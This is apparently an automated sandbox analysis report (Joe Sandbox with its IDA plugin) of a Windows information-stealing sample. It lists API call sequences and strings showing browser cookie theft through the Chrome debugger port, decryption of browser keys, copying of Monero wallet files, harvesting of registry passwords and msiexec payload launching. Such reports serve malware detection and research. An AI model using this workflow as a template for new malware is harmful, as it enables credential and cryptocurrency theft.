                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 1ef3398eb8e707248444a1f6785c1967555aedf672b5e23b9b92b69e3ba38f3a
                                        • Instruction ID: 98d6fdad2795c7cd21705666d050d3c3f7642912322b6bfd3009158d964e8d75
                                        • Opcode Fuzzy Hash: 1ef3398eb8e707248444a1f6785c1967555aedf672b5e23b9b92b69e3ba38f3a
                                        • Instruction Fuzzy Hash: DD12FF719101189ADB14FBA0DDA2FEEB739BF94300F40459AF50676292EF386B49CF61
                                        APIs
                                          • Part of subcall function 00979A50: InternetOpenA.WININET(00990AF6,00000001,00000000,00000000,00000000), ref: 00979A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 00979CAF
                                        • lstrcat.KERNEL32(?,009912C4), ref: 00979CC1
                                        • lstrcat.KERNEL32(?,?), ref: 00979CD5
                                        • lstrcat.KERNEL32(?,009912C8), ref: 00979CE7
                                        • lstrcat.KERNEL32(?,?), ref: 00979CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 00979D0D
                                        • lstrlen.KERNEL32(00000000), ref: 00979D17
                                        • lstrlen.KERNEL32(00000000), ref: 00979D26
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: 8bee6c12ba944bcdc9295ebeedd487303a7cc524d9a297739e2f8a6a60618f26
                                        • Instruction ID: ad0041332a0a83c3d5266c8735c17f0dbce9a9f90a6bc0c7f84f7f65f3efb66c
                                        • Opcode Fuzzy Hash: 8bee6c12ba944bcdc9295ebeedd487303a7cc524d9a297739e2f8a6a60618f26
                                        • Instruction Fuzzy Hash: BC514E76910508ABCB14EBE4DC99FEE7338BB84301F408658F11AA7191EB74AA48CF61
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 009762D0: InternetOpenA.WININET(00990DFF,00000001,00000000,00000000,00000000), ref: 00976331
                                          • Part of subcall function 009762D0: StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00976353
                                          • Part of subcall function 009762D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00976385
                                          • Part of subcall function 009762D0: HttpOpenRequestA.WININET(00000000,GET,?,0181F008,00000000,00000000,00400100,00000000), ref: 009763D5
                                          • Part of subcall function 009762D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0097640F
                                          • Part of subcall function 009762D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00976421
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985568
                                        • lstrlen.KERNEL32(00000000), ref: 0098557F
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 009855B4
                                        • lstrlen.KERNEL32(00000000), ref: 009855D3
                                        • lstrlen.KERNEL32(00000000), ref: 009855FE
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: e4a1ec9fcb9862edfa5026c0bb797250b7db0935e10e1732c3faaa9194ba4967
                                        • Instruction ID: 21b52aa9186e697f08259fe503d587b6d1bbd72be580de167d834feaa53e4728
                                        • Opcode Fuzzy Hash: e4a1ec9fcb9862edfa5026c0bb797250b7db0935e10e1732c3faaa9194ba4967
                                        • Instruction Fuzzy Hash: 9151FC70510108DBDB18FF64CDA6BED773ABF90341F508459F40A67692EB386B49CB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: 2d9855716722a8c1db88cbbf6d231f1209af19c6dea47c52257c04ac6b7d254c
                                        • Instruction ID: 9d88e4257fe9767650289f300300f273b69d470136f9156df890add40d10f312
                                        • Opcode Fuzzy Hash: 2d9855716722a8c1db88cbbf6d231f1209af19c6dea47c52257c04ac6b7d254c
                                        • Instruction Fuzzy Hash: 70C190B59002199BCB14FF60DC99FEE7378BF94304F004599E50AA7281EB74EA85CFA1
                                        APIs
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0098453C
                                        • lstrcat.KERNEL32(?,0181F620), ref: 0098455B
                                        • lstrcat.KERNEL32(?,?), ref: 0098456F
                                        • lstrcat.KERNEL32(?,0181DDD8), ref: 00984583
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 00988F20: GetFileAttributesA.KERNEL32(00000000,?,00971B94,?,?,0099577C,?,?,00990E22), ref: 00988F2F
                                          • Part of subcall function 0097A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0097A489
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                          • Part of subcall function 00989550: GlobalAlloc.KERNEL32(00000000,0098462D,0098462D), ref: 00989563
                                        • StrStrA.SHLWAPI(?,0181F6F8), ref: 00984643
                                        • GlobalFree.KERNEL32(?), ref: 00984762
                                          • Part of subcall function 0097A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A23F
                                          • Part of subcall function 0097A210: LocalAlloc.KERNEL32(00000040,?,?,?,00974F3E,00000000,?), ref: 0097A251
                                          • Part of subcall function 0097A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A27A
                                          • Part of subcall function 0097A210: LocalFree.KERNEL32(?,?,?,?,00974F3E,00000000,?), ref: 0097A28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 009846F3
                                        • StrCmpCA.SHLWAPI(?,009908D2), ref: 00984710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00984722
                                        • lstrcat.KERNEL32(00000000,?), ref: 00984735
                                        • lstrcat.KERNEL32(00000000,00990FA0), ref: 00984744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 888fe9ff0929868eb69e79caba7fcef0a859782d1f94b7fe37601ef22c07dcb4
                                        • Instruction ID: 086887f71bebbfd83a77ad20109c3d9415af524d5db88dc2874f354c9a9d5337
                                        • Opcode Fuzzy Hash: 888fe9ff0929868eb69e79caba7fcef0a859782d1f94b7fe37601ef22c07dcb4
                                        • Instruction Fuzzy Hash: B87142B6900208ABDB14FBA4DD96FEE737DAFC9300F008598B60997181EB75DB44CB61
                                        APIs
                                          • Part of subcall function 009712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009712B4
                                          • Part of subcall function 009712A0: RtlAllocateHeap.NTDLL(00000000), ref: 009712BB
                                          • Part of subcall function 009712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009712D7
                                          • Part of subcall function 009712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009712F5
                                          • Part of subcall function 009712A0: RegCloseKey.ADVAPI32(?), ref: 009712FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097134F
                                        • lstrlen.KERNEL32(?), ref: 0097135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00971377
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00971465
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 009714EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 9df73fc9ab4837439861beee07bf9b1a9374adb90236da5ed7abac295ad6392e
                                        • Instruction ID: bbc05c17d7dab1a45579e1050880ee064ede1620896c7947adfb62dc0234d237
                                        • Opcode Fuzzy Hash: 9df73fc9ab4837439861beee07bf9b1a9374adb90236da5ed7abac295ad6392e
                                        • Instruction Fuzzy Hash: 305174B2D501189BDB15FB60DC92FED733CAB90300F4045D9B60A62192EF345B89CB66
                                        APIs
                                        • InternetOpenA.WININET(00990AF6,00000001,00000000,00000000,00000000), ref: 00979A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00979AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 00979AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: b1e145bedb184d215a07ac06b3f94612e383314ec08eb803347c51b868a0557f
                                        • Instruction ID: 435a3bb20a37a8701dd1d8dd483b9846338bbf33371956d4822fa62bcb325b26
                                        • Opcode Fuzzy Hash: b1e145bedb184d215a07ac06b3f94612e383314ec08eb803347c51b868a0557f
                                        • Instruction Fuzzy Hash: DE411936A50218AFDB14EF94DC95FDD7778FB88740F108198F559AA290CBB0AE84CB60
                                        APIs
                                          • Part of subcall function 00977330: memset.MSVCRT ref: 00977374
                                          • Part of subcall function 00977330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0097739A
                                          • Part of subcall function 00977330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00977411
                                          • Part of subcall function 00977330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0097746D
                                          • Part of subcall function 00977330: GetProcessHeap.KERNEL32(00000000,?), ref: 009774B2
                                          • Part of subcall function 00977330: HeapFree.KERNEL32(00000000), ref: 009774B9
                                        • lstrcat.KERNEL32(00000000,0099192C), ref: 00977666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 009776A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 009776BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 009776EF
                                        • lstrcat.KERNEL32(00000000,00991934), ref: 00977700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00977733
                                        • lstrcat.KERNEL32(00000000,00991938), ref: 0097774D
                                        • task.LIBCPMTD ref: 0097775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: :
                                        • API String ID: 3191641157-3653984579
                                        • Opcode ID: 89774b7fef50d935653670a74096bd62ff686f7a0f76ded9286a481b630d4694
                                        • Instruction ID: 29854f9a1c06d5fe112546415328992a76ca1394c06f6a6cc3cb2b2113d890c7
                                        • Opcode Fuzzy Hash: 89774b7fef50d935653670a74096bd62ff686f7a0f76ded9286a481b630d4694
                                        • Instruction Fuzzy Hash: D6314F76D08105EBDB18EBE4DC96FFF7379BB85301B508218F106672A0DB34A946CB61
                                        APIs
                                        • memset.MSVCRT ref: 00977374
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0097739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00977411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0097746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009774B2
                                        • HeapFree.KERNEL32(00000000), ref: 009774B9
                                        • task.LIBCPMTD ref: 009775B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
